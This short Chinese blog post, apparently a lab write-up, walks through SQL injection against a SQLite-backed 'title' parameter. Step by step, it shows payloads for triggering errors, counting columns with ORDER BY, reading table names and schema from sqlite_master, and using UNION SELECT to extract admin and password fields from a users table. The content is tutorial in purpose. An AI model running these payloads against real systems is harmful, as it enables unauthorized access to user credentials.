1 输入 title=1', 报错为 Error: HY000, 没查到这个报错是什么意思, 可能是 sqlite 报错的标志吧如图:
2 判断字段数, 并查看字段显示位:
输入 title=1'order by 6 --+ 正常, 输入 title=1' order by 7 --+ 报错, 如图:
输入 title=1' union select 1,2,3,4,5,6 --+, 如图:
3 查询表名:
输入 title=1' union select 1,2,3,tbl_name,5,6 from sqlite_master --+, 如图:
4 查询 users 表结构, 即字段名:
输入 title=1' union select 1,2,3,sql,5,6 from sqlite_master --+, 如图:
可以看到表名为 users, 较重要的字段有 admin,password,email; 当然截图里没有截到 admin
5 查询字段内容:
输入 title=1' union select 1,2,3,admin,5,6 from users --+, 如图:
这里只能一个一个的查, 不能使用 MySQL 语句的 group_concat() 函数, 可能有别的方法, 如果有大牛知道, 不防知道一下啊, 我在这拱手作揖先谢过了
来源: http://blog.51cto.com/13577444/2093004